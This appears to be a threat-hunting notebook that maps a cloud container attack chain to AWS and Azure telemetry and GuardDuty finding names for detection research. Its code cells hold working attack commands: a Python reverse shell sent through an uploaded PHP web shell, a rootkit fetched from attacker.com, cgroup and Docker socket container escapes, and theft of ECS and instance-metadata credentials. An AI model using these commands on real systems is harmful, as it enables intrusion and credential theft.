# **Cloud Threat Hunting Simulation with AI**

## **Hypothesis**
**‚ÄúAn adversary may exploit a public-facing containerized application to gain execution, abuse the underlying host‚Äôs cloud identity to obtain access tokens, and leverage those credentials to enumerate cloud resources and escalate privileges through container host misconfigurations.‚Äù**

> ***Initial Access ‚Üí Web Shell Deployment ‚Üí Remote Code Execution (RCE) ‚Üí Environment Enumeration ‚Üí Cloud Identity Discovery ‚Üí Token Acquisition ‚Üí Control Plane Enumeration ‚Üí Host Misconfiguration Exploitation ‚Üí Privilege Escalation***





#**Data Sources**


## **AWS**

The AWS-side attack simulation and validation leverage the following logging categories to cover the full attack lifecycle, from initial access through command-and-control and privilege escalation:
[**Detailed Synthetic JSONs**](https://github.com/Ashis-Palai/AI-Powered-Cloud-Threat-Hunting-Simulations/tree/main/json_data_aws)

- **AWS GuardDuty**  
  Used to capture runtime threats, anomalous IAM behavior, reverse shell activity, metadata service abuse, Docker socket access, and EC2 command-and-control communication.

- **AWS CloudTrail**  
  Used to record identity discovery, permission evaluation, and resource enumeration activities performed using compromised credentials.

- **AWS VPC Flow Logs**  
  Used to observe network-level behavior, including outbound beaconing, session establishment, and sustained C2 communication from compromised EC2 resources.

- **AWS WAF (Web ACL) Logs**  
  Used to capture initial exploitation attempts against public-facing web applications, including web shell deployment and malicious request patterns.



##**AZURE**

The Azure-side attack simulation and validation leverage the following logging categories and tables. [**Detailed Synthetic JSONs**](https://github.com/Ashis-Palai/AI-Powered-Cloud-Threat-Hunting-Simulations/tree/main/json_data/json_data_azure_T1190)



- **Process Execution Analysis**  
  Analyzed process creation and execution activity using the `DeviceProcessEvents` table.

- **Post-Execution Network Analysis**  
  Leveraged the `DeviceNetworkEvents` table to trace outbound and lateral network communications following execution.

- **Identity and Authentication Analysis**  
  Analyzed Managed Identity authentication and access token issuance using the `SigninLogs` table.

- **Control Plane Activity Analysis**  
  Tracked Azure Resource Manager operations, including RBAC and resource enumeration, using the `AzureActivity` table.


# **AI can help with Exploration**




## **AWS-Specific Exploration Questions:**
* Did the container access ECS task or EC2 instance metadata endpoints to retrieve IAM role credentials?
* Were STS APIs such as `GetCallerIdentity` or IAM simulation APIs invoked shortly after runtime execution?
* Did CloudTrail record enumeration of S3 buckets or other resources using the assumed role?
* Were there GuardDuty findings indicating reverse shell activity, metadata abuse, or Docker socket access?
* Did VPC Flow Logs show outbound C2 beaconing from the affected EC2 instance?


## **Azure-Specific Exploration Questions:**
* Did the container access the Azure Instance Metadata Service to request Managed Identity access tokens?
* Were non-interactive sign-in events recorded for a Managed Identity in `SigninLogs`?
* Did `AzureActivity` logs show RBAC or resource enumeration using the managed identity?
* Were storage accounts or blob containers enumerated using management or data-plane APIs?
* Was the Docker socket accessed to create privileged containers indicating host-level escalation?


#AWS



https://www.trendmicro.com/en_us/research/22/j/threat-actors-target-aws-ec2-workloads-to-steal-credentials.html?utm_source=chatgpt.com


> ‚ÄúAn adversary may exploit a public-facing containerized application to gain execution and access workload metadata, then use the obtained credentials to enumerate container orchestration resources.‚Äù

App Exploit ‚Üí Web Shell ‚Üí RCE ‚Üí Env Enum ‚Üí Task/Role Discovery ‚Üí Role Assumption ‚Üí Control Plane Enum ‚Üí Escalation ‚Üí Host Metadata


| Attack Stage                         | Description (Research Context)                                          | AWS Telemetry Log Sources                                                                                 | Azure Telemetry Log Sources                                                                 |
| ------------------------------------ | ----------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------- |
| **App Exploit**                      | Vulnerability in a public-facing containerized application is exploited | ALB / NLB Access Logs<br>CloudFront Logs (if used)<br>WAF Logs<br>VPC Flow Logs                           | Application Gateway Access Logs<br>Azure Front Door Logs<br>Azure WAF Logs<br>NSG Flow Logs |
| **Web Shell Implant**                | Malicious script or file written to container filesystem                | Container stdout/stderr logs (CloudWatch Logs)<br>EKS/ECS Task Logs<br>ECR image scan findings (indirect) | Container stdout/stderr logs (Azure Monitor / Log Analytics)<br>AKS Container Logs          |
| **Remote Code Execution (RCE)**      | Attacker executes commands via web shell or reverse shell               | CloudWatch Logs (application/runtime)<br>VPC Flow Logs (egress connections)                               | Azure Monitor Logs<br>NSG Flow Logs<br>Azure Firewall Logs                                  |
| **Environment Variable Enumeration** | Runtime inspection to identify credentials, config, or context          | CloudWatch Logs (process output)<br>ECS Task Metadata access (indirect)                                   | Azure Monitor Container Logs<br>AKS diagnostic logs                                         |
| **Task / Role Discovery**            | Identification of workload identity, task, cluster, or role             | CloudTrail (ECS:Describe*, List*)<br>ECS Task Metadata endpoint access                                    | Azure Activity Logs (AKS, Container Apps)<br>Managed Identity token requests                |
| **Role Assumption**                  | Temporary credentials issued via workload or instance identity          | CloudTrail (STS:AssumeRole)<br>IAM Access Analyzer (contextual)                                           | Azure AD Sign-in Logs<br>Managed Identity authentication logs                               |
| **Control Plane Enumeration**        | Read-only enumeration of orchestration and cloud resources              | CloudTrail (List*, Describe*)<br>GuardDuty findings (contextual)                                          | Azure Activity Logs (read operations)<br>Azure Resource Graph query logs                    |
| **Privilege Escalation Attempts**    | Attempts to expand access beyond initial identity                       | CloudTrail (Denied / unusual IAM, ECS, EC2 calls)<br>IAM Policy evaluation logs                           | Azure Activity Logs (AuthorizationFailed)<br>Azure AD Audit Logs                            |
| **Host Metadata Access**             | Attempts to retrieve broader permissions via host metadata service      | VPC Flow Logs (169.254.169.254)<br>CloudWatch Logs (application access)<br>GuardDuty (IMDS anomalies)     | Azure IMDS access logs (169.254.169.254)<br>NSG Flow Logs<br>Azure Defender alerts          |


## üìå Synthetic Cloud Attack Chain Telemetry Mapping  
*(For learning, detection engineering, and cloud security research only)*

| # | Attack Chain Stage | Example Benign / Synthetic Action | **AWS Telemetry Sources** | **Azure Telemetry Sources** | Key Detection Notes |
|---|-------------------|-----------------------------------|---------------------------|-----------------------------|---------------------|
| 1 | App Exploit | HTTP POST abusing file upload / input validation | ALB / ELB Access Logs<br>AWS WAF Logs<br>CloudWatch Logs (App stdout/stderr) | AppServiceHTTPLogs<br>Azure Front Door / App Gateway Access Logs<br>Azure WAF Logs | Look for abnormal POSTs, file uploads, unusual MIME types |
| 2 | Web Shell Deployment | Upload of `.php`, `.py`, `.jsp` into web directory | CloudWatch Logs (Application)<br>ECR Image Scan Findings (indirect)<br>VPC Flow Logs | AppServiceFileAuditLogs<br>Azure Monitor Logs (App Container)<br>Storage Analytics Logs | Executable files written to web paths |
| 3 | Remote Code Execution (RCE) | Shell spawned inside container | CloudWatch Logs (stdout/stderr)<br>EC2 EDR / OS Audit Logs (if enabled)<br>VPC Flow Logs | ContainerLog / ContainerLogV2 (AKS)<br>Microsoft Defender for Containers | Container runtime execution is often a blind spot |
| 4 | Environment Enumeration | `env`, process and cgroup inspection | ‚ùå (No native telemetry)<br>Runtime Security / EDR (if present) | ‚ùå (No native telemetry)<br>Defender for Containers (behavioral) | Usually invisible without runtime controls |
| 5 | Task / Role Discovery | Query task/workload metadata endpoint | ‚ùå (Metadata access not logged)<br>Runtime Security (if enabled) | ‚ùå (IMDS / MSI access not logged)<br>Defender for Cloud alerts | Detection relies on follow-on API usage |
| 6 | Role Assumption | `sts:GetCallerIdentity` / token usage | CloudTrail ‚Äì Management Events<br>AWS GuardDuty | Entra ID SignInLogs<br>AADNonInteractiveUserSignInLogs | First control-plane signal of compromise |
| 7 | Control Plane Enumeration | IAM, ECS, S3, Secrets APIs | CloudTrail (IAM, ECS, S3)<br>CloudTrail Data Events<br>GuardDuty | AzureActivity<br>AzureResourceManager Logs<br>Microsoft Defender for Cloud | Look for unusual read-heavy API patterns |
| 8 | Privilege Escalation Attempt | Describe roles, tasks, identities | CloudTrail (AccessDenied, List/Get APIs)<br>IAM Access Analyzer | AzureActivity (AuthorizationFailed)<br>Entra ID AuditLogs | Escalation often shows as denied attempts |
| 9 | Host Metadata Access | Access EC2 IMDS / Azure IMDS | ‚ùå (IMDS access not logged)<br>GuardDuty Findings | ‚ùå (IMDS not logged)<br>Defender for Cloud Alerts | Prevent with IMDSv2 / managed identity scoping |

---

### üß† Research & Detection Notes
- Metadata service access is **silent** in both AWS and Azure.
- **Control-plane telemetry (CloudTrail / AzureActivity)** is the first reliable signal.
- Effective detection requires **correlation across app, runtime, and identity logs**.
- Synthetic logs should model **time-ordered transitions** from workload ‚Üí identity ‚Üí control plane.

---


| Attack Phase                      | Description (Research Context)                                                        | AWS Telemetry Sources                                                                          | Azure Telemetry Sources                                                                                     |
| --------------------------------- | ------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------- |
| **App Exploit**                   | Initial compromise via vulnerability in a public-facing app (e.g., RCE, file upload). | AWS WAF Logs<br>ALB / NLB Access Logs<br>CloudFront Logs<br>VPC Flow Logs                      | Azure WAF Logs<br>Application Gateway Logs<br>NSG Flow Logs                                                 |
| **Web Shell**                     | Upload of a persistent script enabling remote interaction.                            | CloudWatch Logs (app/runtime)<br>GuardDuty Runtime Monitoring<br>ECR image findings (indirect) | Microsoft Defender for Cloud (Workload Protection)<br>App Service HTTP Logs<br>Azure Monitor Container Logs |
| **Remote Code Execution (RCE)**   | Arbitrary command execution via web/reverse shell.                                    | CloudWatch Logs (stderr/stdout)<br>AWS SSM Run Command Logs<br>OS-level Auditd / Sysmon        | Azure Monitor Agent (Syslog, Security Events)<br>Microsoft Defender for Endpoint                            |
| **Environment Enumeration**       | Inspection of env vars, configs, and local secrets.                                   | CloudWatch Logs<br>IMDS access patterns (169.254.169.254)                                      | Azure Monitor Logs<br>Application Insights<br>Azure IMDS access                                             |
| **Task / Role Discovery**         | Identifying workload identity, task, cluster, or role.                                | IMDSv2 (iam/info, security-credentials)<br>CloudTrail (GetCallerIdentity, Describe*)           | Managed Identity token requests<br>Azure Activity Logs                                                      |
| **Role Assumption**               | Pivoting to temporary credentials for broader access.                                 | CloudTrail (STS:AssumeRole)<br>IAM Access Analyzer (contextual)                                | Microsoft Entra ID Sign-in Logs<br>Managed Identity auth logs                                               |
| **Control Plane Enumeration**     | Read-only listing of cloud and orchestration resources.                               | CloudTrail (List*, Describe*)<br>GuardDuty findings (API enumeration)                          | Azure Activity Logs (Administrative / Read)<br>Entra Audit Logs                                             |
| **Privilege Escalation**          | Abusing permissions to expand access.                                                 | CloudTrail (PassRole, PutRolePolicy, CreateAccessKey)<br>IAM Policy evaluation                 | Azure Activity Logs (roleAssignments/write)<br>Entra Audit Logs                                             |
| **Host Metadata Access**          | Accessing host-level identity or infra context.                                       | VPC Flow Logs (169.254.169.254)<br>GuardDuty (IMDS anomaly)<br>Route 53 Resolver Logs          | NSG Flow Logs (169.254.169.254)<br>Azure Defender Alerts                                                    |
| **Lateral Movement / Validation** | Testing access to additional workloads or resources.                                  | CloudTrail (cross-service access)<br>VPC Flow Logs                                             | Azure Activity Logs<br>Azure Resource Graph queries                                                         |


| # | Attack Chain Stage               | Example Benign / Synthetic Action            | **AWS Telemetry Sources**                                                        | **Azure Telemetry Sources**                                                 | Key Detection Notes                                  |
| - | -------------------------------- | -------------------------------------------- | -------------------------------------------------------------------------------- | --------------------------------------------------------------------------- | ---------------------------------------------------- |
| 1 | **App Exploit**                  | Abnormal HTTP POST, file upload, input abuse | ALB / ELB Access Logs<br>AWS WAF Logs<br>CloudWatch App Logs                     | AppServiceHTTPLogs<br>Azure Front Door / App Gateway Logs<br>Azure WAF Logs | Look for anomalous POSTs, MIME types, upload paths   |
| 2 | **Web Shell Deployment**         | Upload of executable script to web directory | CloudWatch Logs (App)<br>ECR Scan Findings (indirect)<br>VPC Flow Logs (egress)  | AppServiceFileAuditLogs<br>Azure Monitor App Logs<br>Storage Analytics Logs | File writes to web paths are strong early indicators |
| 3 | **Remote Code Execution (RCE)**  | Shell spawned inside container runtime       | CloudWatch stdout/stderr<br>Runtime Security / EDR (if enabled)<br>VPC Flow Logs | ContainerLog / ContainerLogV2<br>Defender for Containers                    | Container execution is often a telemetry blind spot  |
| 4 | **Environment Enumeration**      | `env`, process, filesystem inspection        | ‚ùå No native telemetry<br>Runtime Security / EDR only                             | ‚ùå No native telemetry<br>Defender for Containers                            | Typically invisible without runtime instrumentation  |
| 5 | **Task / Role Discovery**        | Query workload / task metadata endpoint      | ‚ùå Metadata access not logged<br>Runtime Security (if enabled)                    | ‚ùå IMDS / MSI access not logged<br>Defender for Cloud alerts                 | Detection relies on follow-on identity usage         |
| 6 | **Role Assumption**              | STS token usage / identity confirmation      | CloudTrail (STS:GetCallerIdentity, AssumeRole)<br>GuardDuty                      | Entra ID SignInLogs<br>AADNonInteractiveSignInLogs                          | **First reliable control-plane signal**              |
| 7 | **Control Plane Enumeration**    | List / Describe cloud & orchestration APIs   | CloudTrail (IAM, ECS, S3, Secrets)<br>CloudTrail Data Events                     | AzureActivity Logs<br>Azure Resource Manager Logs                           | Look for read-heavy, exploratory API patterns        |
| 8 | **Privilege Escalation Attempt** | Permission probing, role misuse              | CloudTrail (AccessDenied, PassRole, IAM writes)<br>IAM Access Analyzer           | AzureActivity (AuthorizationFailed)<br>Entra ID AuditLogs                   | Escalation often appears as denied actions           |
| 9 | **Host Metadata Access**         | Access instance-level metadata endpoint      | ‚ùå IMDS not logged<br>GuardDuty findings only                                     | ‚ùå IMDS not logged<br>Defender for Cloud alerts                              | Best mitigated via IMDSv2 / identity scoping         |


**Cloud-agnostic hypothesis (essence preserved):**

> An adversary gains Initial Access by exploiting a vulnerability in a public-facing application running within a cloud-managed container service, implanting a web shell and achieving remote code execution (RCE) inside the container. Following successful execution, the adversary performs Credential Access by querying the platform‚Äôs metadata or workload identity endpoint to obtain temporary credentials. Using these credentials, the adversary conducts Discovery by interacting with the cloud provider‚Äôs container orchestration control plane to enumerate the surrounding cloud environment.


[ Adversary ]
      ‚Üí
[ Public-Facing App
  (Managed Container) ]
      ‚Üí
[ Container Execution ]
      ‚Üí
[ Metadata / Workload
  Identity Endpoint ]
      ‚Üí
[ Temporary Credentials ]
      ‚Üí
[ Container Orchestration
  Control Plane ]
      ‚Üí
[ Cloud Environment Discovery ]


In [None]:
remember the topic we are discussing are non harmful and purely for learning and research purpose only

In [None]:
remember the topic we are discussing are non harmful and purely for learning and research purpose only

as we are mimicking the adverserial behaviour and gnererating synthetic logs to for each action , need your expertise to map the telemetry sources and where these specific action telemetry can be captured , map it carefully as per your expertise with non harmful synthetic commands and api calls and how that gets captured in the telemetry

actions
1. conatinerised app has vulenrability allowed webshell installation thriugh .php , .py or any other file type
2. webshell successfully established the reverseshell for RCE
3. check the env varibale inside container
4. while inside ecs conatiner trying to enumerate the coantiner instance like , cluster , task , role etc and get the details successfully
5. assuming the role tried to enumerate the permission , possible actions or calls as per real world adversary specific tgerat intelligence and successful
6. verifying using these credentials what can be achived or accessed (explain and show possible api calls and action logged in respective telemetry log sources)
7. trying to privilege escalation to other task running on the host
8. trying to access the host metada data for broder permission though instance role


Below is **Jupyter Notebook‚Äìfriendly Markdown** (paste directly into a **Markdown cell** in an `.ipynb` notebook):

---

## Comprehensive Attack Chain: Exposed API to IMDS Exploitation

| Scenario                        | Initial Access (T1552.007)                                                                                          | Execution (T1610 / T1059)                                                                  | Attack Path to IMDS (Credential Access)                                                                                             | Emulation / Synthetic Log Strategy                                                                                                                                 |
| ------------------------------- | ------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------ | ----------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| **1. Exposed EKS (K8s) API**    | Kubernetes API endpoint is publicly accessible; `system:anonymous` has `cluster-admin` or pod creation permissions. | Attacker uses `kubectl` to deploy a **privileged Pod** or a Pod with `hostNetwork: true`.  | Malicious Pod sends HTTP requests to `http://169.254.169.254` to retrieve the EKS worker node IAM role credentials.                 | **EKS Audit Logs:** Simulate `POST /api/v1/pods` events from `system:anonymous`.<br>**GuardDuty:** `Kubernetes/AnonymousAccessGranted`.                            |
| **2. Exposed ECS (AWS) API**    | Attacker obtains AWS IAM keys with `ecs:RunTask` permissions (e.g., from a leaked `.env` file or CI secret).        | Attacker invokes the ECS `RunTask` API to start a new task on an EC2-backed cluster.       | The task executes a script that queries IMDS, stealing either the EC2 host IAM role or the ECS task execution role credentials.     | **CloudTrail:** Simulated `RunTask` events from an unfamiliar IP address or region.<br>**VPC Flow Logs:** Network flows from container IPs to `169.254.169.254`.   |
| **3. Exposed Docker API (EC2)** | Docker daemon exposed on port `2375` (no TLS) or `2376` (misconfigured TLS) on an EC2 instance.                     | Attacker uses `docker -H <IP>:2375 run` to start a container with the `--privileged` flag. | Attacker mounts the host filesystem or uses `--net=host` to bypass isolation and access IMDS for EC2 instance IAM role credentials. | **VPC Flow Logs:** Traffic from the EC2 instance to `169.254.169.254` originating from container processes.<br>**Host Logs:** Docker API access from external IPs. |




In [None]:
actions
1. conatinerised app has vulenrability allowed webshell installation thriugh .php , .py or any other file type
2. webshell successfully established the reverseshell for RCE
3. check the env varibale inside container
4. while inside ecs conatiner trying to enumerate the coantiner instance like , cluster , task , role etc and get the details successfully
5. assuming the role tried to enumerate the permission , possible actions or calls as per real world adversary specific target intelligence and successful
6. verifying using these credentials what can be achived or accessed (explain and show possible api calls and action logged in respective telemetry log sources)
7. trying to privilege escalation to other task running on the host
8. trying to access the host metada data for broder permission though instance role


In [None]:
```
# cat /proc/mounts
# capsh --print
# mount -o remount,rw /target_path


# curl --unix-socket /var/run/docker.sock http://localhost/containers/json.
# PrivilegeEscalation:Runtime/DockerSocketAccessed

# echo "/tmp/evil_payload.sh" > /sys/fs/cgroup/cpu/release_agent
# mkdir /sys/fs/cgroup/cpu/attack_group
# sh -c "echo 1 > /sys/fs/cgroup/cpu/attack_group/notify_on_release"
# PrivilegeEscalation:Runtime/CgroupReleaseAgentModified


export LD_PRELOAD=/tmp/libhide.so && ls
cp /tmp/malicious.so /mnt/host_lib/x86_64-linux-gnu/libc.so.6

# wget attacker.com -O /tmp/rootkit.ko
# insmod /tmp/rootkit.ko OR modprobe /tmp/rootkit.ko
# Persistence:Runtime/KernelModuleLoaded.

nmap -sP 10.0.0.0/24

curl 127.0.0.1:51678/v1/tasks
TOKEN=$(curl -X PUT "169.254.169.254" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/

```

In [None]:
'''
# POST https://myapp.com/api/v1/uploads?filename=shell.php
# GET /uploads/shell.php?cmd=python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
# Execution:Runtime/ReverseShell and Backdoor:EC2/C&CActivity.B
# Backdoor:EC2/C&CActivity.B -> Execution:Container/MaliciousFile
# Backdoor:Runtime/C&CActivity.B
# Execution:Runtime/SuspiciousShellCreated
# DefenseEvasion:Runtime/FilelessExecution

# whoami
# cat /etc/passwd
# env
# curl $ECS_CONTAINER_METADATA_URI_V4/task   #curl http://169.254.170.2/v4/task
# curl http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI # curl curl http://169.254.170.2/v2/credentials/abcd1234-5678-efgh
# Discovery:Runtime/SuspiciousCommand
# UnauthorizedAccess:Runtime/MetadataDNSRebind

# aws configure set aws_access_key_id
# aws sts get-caller-identity
# aws iam simulate-custom-policy --policy-input-list '{"Statement":[{"Effect":"Allow","Action":["s3:ListBucket"],"Resource":["*"]}]}'
# aws s3 ls


curl -X POST --unix-socket /var/run/docker.sock \
  http://localhost/containers/create \
  -H "Content-Type: application/json" \
  -d '''{
    "Image": "ubuntu:22.04",
    "Cmd": ["/bin/sh"],
    "NetworkMode": "host",
    "HostConfig": {
      "Privileged": true,
      "Binds": ["/:/hostfs:rw"]
    },
    "name": "escape-container"
  }'''
  #PrivilegeEscalation:Runtime/DockerSocketAccessed


curl -X POST --unix-socket /var/run/docker.sock \
  http://localhost/containers/escape-container/start
#  PrivilegeEscalation:Runtime/PrivilegedContainer [High] +
#  PrivilegeEscalation:Runtime/ContainerMountsHostDirectory [Medium]


EXEC_ID=$(curl -X POST --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{"AttachStdin": true, "AttachStdout": true, "AttachStderr": true, "Tty": true, "Cmd": ["/bin/sh"]}' \
  http://localhost/containers/escape-container/exec | jq -r '.Id')

# This creates INTERACTIVE shell - type commands one by one:
curl -X POST --unix-socket /var/run/docker.sock \
  "http://localhost/exec/$EXEC_ID/start" \
  -H "Content-Type: application/json" \
  --data '{"Detach": false, "Tty": true}'

TOKEN=$(curl -X PUT "169.254.169.254" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
# UnauthorizedAccess:Runtime/MetadataServiceAccess [High]
# UnauthorizedAccess:EC2/MetadataServiceAccess [High] or
# UnauthorizedAccess:EC2/MetaDataDNSRebind [High

'''

In [None]:
runtime-monitoring

# CryptoCurrency:Runtime/BitcoinTool.B

# Backdoor:Runtime/C&CActivity.B

# UnauthorizedAccess:Runtime/TorRelay

# UnauthorizedAccess:Runtime/TorClient

# Trojan:Runtime/BlackholeTraffic

# Trojan:Runtime/DropPoint

# CryptoCurrency:Runtime/BitcoinTool.B!DNS

# Backdoor:Runtime/C&CActivity.B!DNS

# Trojan:Runtime/BlackholeTraffic!DNS

# Trojan:Runtime/DropPoint!DNS

# Trojan:Runtime/DGADomainRequest.C!DNS

# Trojan:Runtime/DriveBySourceTraffic!DNS

# Trojan:Runtime/PhishingDomainRequest!DNS

# Impact:Runtime/AbusedDomainRequest.Reputation

# Impact:Runtime/BitcoinDomainRequest.Reputation

# Impact:Runtime/MaliciousDomainRequest.Reputation

# Impact:Runtime/SuspiciousDomainRequest.Reputation

# UnauthorizedAccess:Runtime/MetadataDNSRebind

# Execution:Runtime/NewBinaryExecuted

# PrivilegeEscalation:Runtime/DockerSocketAccessed

# PrivilegeEscalation:Runtime/RuncContainerEscape

# PrivilegeEscalation:Runtime/CGroupsReleaseAgentModified

# DefenseEvasion:Runtime/ProcessInjection.Proc

# DefenseEvasion:Runtime/ProcessInjection.Ptrace

# DefenseEvasion:Runtime/ProcessInjection.VirtualMemoryWrite

# Execution:Runtime/ReverseShell

# DefenseEvasion:Runtime/FilelessExecution

# Impact:Runtime/CryptoMinerExecuted

# Execution:Runtime/NewLibraryLoaded

# PrivilegeEscalation:Runtime/ContainerMountsHostDirectory

# PrivilegeEscalation:Runtime/UserfaultfdUsage

# Execution:Runtime/SuspiciousTool

# Execution:Runtime/SuspiciousCommand

# DefenseEvasion:Runtime/SuspiciousCommand

# DefenseEvasion:Runtime/PtraceAntiDebugging

# Execution:Runtime/MaliciousFileExecuted

# Execution:Runtime/SuspiciousShellCreated

# PrivilegeEscalation:Runtime/ElevationToRoot

# Discovery:Runtime/SuspiciousCommand

# Persistence:Runtime/SuspiciousCommand

# PrivilegeEscalation:Runtime/SuspiciousCommand

# DefenseEvasion:Runtime/KernelModuleLoaded

malware-protection

# Execution:EC2/MaliciousFile

# Execution:ECS/MaliciousFile

# Execution:Kubernetes/MaliciousFile

# Execution:Container/MaliciousFile

# Execution:EC2/SuspiciousFile

# Execution:ECS/SuspiciousFile

# Execution:Kubernetes/SuspiciousFile

# Execution:Container/SuspiciousFile

ec2 findings

# Backdoor:EC2/C&CActivity.B

# Backdoor:EC2/C&CActivity.B!DNS

# Backdoor:EC2/DenialOfService.Dns

# Backdoor:EC2/DenialOfService.Tcp

# Backdoor:EC2/DenialOfService.Udp

# Backdoor:EC2/DenialOfService.UdpOnTcpPorts

# Backdoor:EC2/DenialOfService.UnusualProtocol

# Backdoor:EC2/Spambot

# Behavior:EC2/NetworkPortUnusual

# Behavior:EC2/TrafficVolumeUnusual

# CryptoCurrency:EC2/BitcoinTool.B

# CryptoCurrency:EC2/BitcoinTool.B!DNS

# DefenseEvasion:EC2/UnusualDNSResolver

# DefenseEvasion:EC2/UnusualDoHActivity

# DefenseEvasion:EC2/UnusualDoTActivity

# Impact:EC2/AbusedDomainRequest.Reputation

# Impact:EC2/BitcoinDomainRequest.Reputation

# Impact:EC2/MaliciousDomainRequest.Reputation

# Impact:EC2/MaliciousDomainRequest.Custom

# Impact:EC2/PortSweep

# Impact:EC2/SuspiciousDomainRequest.Reputation

# Impact:EC2/WinRMBruteForce

# Recon:EC2/PortProbeEMRUnprotectedPort

# Recon:EC2/PortProbeUnprotectedPort

# Recon:EC2/Portscan

# Trojan:EC2/BlackholeTraffic

# Trojan:EC2/BlackholeTraffic!DNS

# Trojan:EC2/DGADomainRequest.B

# Trojan:EC2/DGADomainRequest.C!DNS

# Trojan:EC2/DNSDataExfiltration

# Trojan:EC2/DriveBySourceTraffic!DNS

# Trojan:EC2/DropPoint

# Trojan:EC2/DropPoint!DNS

# Trojan:EC2/PhishingDomainRequest!DNS

# UnauthorizedAccess:EC2/MaliciousIPCaller.Custom

# UnauthorizedAccess:EC2/MetadataDNSRebind

# UnauthorizedAccess:EC2/RDPBruteForce

# UnauthorizedAccess:EC2/SSHBruteForce

# UnauthorizedAccess:EC2/TorClient

# UnauthorizedAccess:EC2/TorRelay

IAM findings
CredentialAccess:IAMUser/AnomalousBehavior

DefenseEvasion:IAMUser/AnomalousBehavior

DefenseEvasion:IAMUser/BedrockLoggingDisabled

Discovery:IAMUser/AnomalousBehavior

Exfiltration:IAMUser/AnomalousBehavior

Impact:IAMUser/AnomalousBehavior

InitialAccess:IAMUser/AnomalousBehavior

PenTest:IAMUser/KaliLinux

PenTest:IAMUser/ParrotLinux

PenTest:IAMUser/PentooLinux

Persistence:IAMUser/AnomalousBehavior

Policy:IAMUser/RootCredentialUsage

Policy:IAMUser/ShortTermRootCredentialUsage

PrivilegeEscalation:IAMUser/AnomalousBehavior

Recon:IAMUser/MaliciousIPCaller

Recon:IAMUser/MaliciousIPCaller.Custom

Recon:IAMUser/TorIPCaller

Stealth:IAMUser/CloudTrailLoggingDisabled

Stealth:IAMUser/PasswordPolicyChange

UnauthorizedAccess:IAMUser/ConsoleLoginSuccess.B

UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS

UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS

UnauthorizedAccess:IAMUser/MaliciousIPCaller

UnauthorizedAccess:IAMUser/MaliciousIPCaller.Custom

UnauthorizedAccess:IAMUser/ResourceCredentialExfiltration.OutsideAWS

UnauthorizedAccess:IAMUser/TorIPCaller

In [None]:

env
-- AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/abcd1234-5678-efgh
-- ECS_CONTAINER_METADATA_URI_V4=http://169.254.170.2/v4


curl http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI # curl curl http://169.254.170.2/v2/credentials/abcd1234-5678-efgh

--{
  "RoleArn": "arn:aws:iam::123456789012:role/my-ecs-task-role",
  "AccessKeyId": "ASIAXXXXXXXX",
  "SecretAccessKey": "xxxxxxxxxxxxxxxx",
  "Token": "IQoJb3JpZ2luX2VjE...",
  "Expiration": "2025-01-01T13:00:00Z"
}

curl $ECS_CONTAINER_METADATA_URI_V4/task   #curl http://169.254.170.2/v4/task

--{
  "Cluster": "arn:aws:ecs:us-east-1:123456789012:cluster/my-ecs-cluster",
  "TaskARN": "arn:aws:ecs:us-east-1:123456789012:task/my-ecs-cluster/abcd1234efgh5678",
  "Family": "my-task-definition",
  "Revision": "12",
  "DesiredStatus": "RUNNING",
  "KnownStatus": "RUNNING",
  "LaunchType": "EC2",
  "AvailabilityZone": "us-east-1a",

  "Containers": [
    {
      "DockerId": "a1b2c3d4e5f6",
      "Name": "app-container",
      "DockerName": "ecs-my-task-definition-12-app-container-abcdef",
      "Image": "123456789012.dkr.ecr.us-east-1.amazonaws.com/my-app:latest",
      "ImageID": "sha256:abcdef1234567890",

      "DesiredStatus": "RUNNING",
      "KnownStatus": "RUNNING",

      "Limits": {
        "CPU": 256,
        "Memory": 512
      },

      "CreatedAt": "2025-01-01T12:00:00.000000000Z",
      "StartedAt": "2025-01-01T12:00:10.000000000Z",

      "Networks": [
        {
          "NetworkMode": "awsvpc",
          "IPv4Addresses": ["10.0.1.25"]
        }
      ]
    }
  ],

  "CPU": "256",
  "Memory": "512",

  "PullStartedAt": "2025-01-01T11:59:30.000000000Z",
  "PullStoppedAt": "2025-01-01T11:59:55.000000000Z"
}



curl 127.0.0.1:51678/v1/tasks

--{
  "Tasks": [
    {
      "Arn": "arn:aws:ecs:us-east-1:123456789012:task/my-ecs-cluster/1111aaaa2222bbbb",
      "Family": "orders-service",
      "Version": "8",
      "DesiredStatus": "RUNNING",
      "KnownStatus": "RUNNING",
      "Containers": [
        {
          "DockerId": "d1c2b3a4e5f6",
          "Name": "orders-api",
          "Image": "123456789012.dkr.ecr.us-east-1.amazonaws.com/orders:latest",
          "KnownStatus": "RUNNING",
          "Ports": [
            {
              "ContainerPort": 8080,
              "HostPort": 8080,
              "Protocol": "tcp"
            }
          ]
        }
      ]
    },
    {
      "Arn": "arn:aws:ecs:us-east-1:123456789012:task/my-ecs-cluster/3333cccc4444dddd",
      "Family": "payments-service",
      "Version": "15",
      "DesiredStatus": "RUNNING",
      "KnownStatus": "RUNNING",
      "Containers": [
        {
          "DockerId": "f6e5d4c3b2a1",
          "Name": "payments-worker",
          "Image": "123456789012.dkr.ecr.us-east-1.amazonaws.com/payments:prod",
          "KnownStatus": "RUNNING"
        }
      ]
    },
    {
      "Arn": "arn:aws:ecs:us-east-1:123456789012:task/my-ecs-cluster/5555eeee6666ffff",
